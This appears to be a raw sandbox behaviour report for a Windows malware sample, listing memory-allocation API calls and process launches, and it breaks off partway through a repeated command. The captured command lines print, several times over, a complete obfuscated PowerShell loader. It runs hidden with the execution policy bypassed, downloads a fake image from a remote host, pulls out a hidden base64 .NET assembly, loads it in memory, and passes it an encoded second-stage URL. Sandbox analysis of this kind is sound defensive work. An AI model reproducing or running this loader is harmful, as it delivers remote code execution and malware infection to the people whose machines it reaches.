stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 7606272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002e70000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000035b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2780
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€b€€Bw€€GE€€VwBs€€H€€€€YQBX€€Gw€€c€€Bh€€Fc€€b€€Bw€€GE€€VwB0€€HY€€YgBH€€FI€€c€€Bi€€DM€€SgBr€€Ew€€egBR€€DM€€TQBT€€DQ€€MwBN€€Hk€€N€€€€w€€E4€€V€€BJ€€HU€€TgBU€€Gc€€e€€BM€€Hk€€O€€€€2€€GM€€S€€BS€€D€€€€YQBB€€D0€€PQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bm€€GQ€€ZgBk€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GE€€Z€€Bz€€GE€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZQ€€n€€C€€€€L€€€€g€€Cc€€YwB1€€Cc€€KQ€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€b€€Bw€€GE€€VwBs€€H€€€€YQBX€€Gw€€c€€Bh€€Fc€€b€€Bw€€GE€€VwB0€€HY€€YgBH€€FI€€c€€Bi€€DM€€SgBr€€Ew€€egBR€€DM€€TQBT€€DQ€€MwBN€€Hk€€N€€€€w€€E4€€V€€BJ€€HU€€TgBU€€Gc€€e€€BM€€Hk€€O€€€€2€€GM€€S€€BS€€D€€€€YQBB€€D0€€PQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bm€€GQ€€ZgBk€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GE€€Z€€Bz€€GE€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZQ€€n€€C€€€€L€€€€g€€Cc€€YwB1€€Cc€€KQ€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmlpaWlpaWlpaWlpaWtvbGRpb3JkLzQ3MS43My40NTIuNTgxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 3008
thread_handle: 0x00000000000004bc
process_identifier: 3004
current_directory: C:\Users\test22\Desktop
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€b€€Bw€€GE€€VwBs€€H€€€€YQBX€€Gw€€c€€Bh€€Fc€€b€€Bw€€GE€€VwB0€€HY€€YgBH€€FI€€c€€Bi€€DM€€SgBr€€Ew€€egBR€€DM€€TQBT€€DQ€€MwBN€€Hk€€N€€€€w€€E4€€V€€BJ€€HU€€TgBU€€Gc€€e€€BM€€Hk€€O€€€€2€€GM€€S€€BS€€D€€€€YQBB€€D0€€PQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bm€€GQ€€ZgBk€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GE€€Z€€Bz€€GE€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZQ€€n€€C€€€€L€€€€g€€Cc€€YwB1€€Cc€€KQ€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000004b4
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4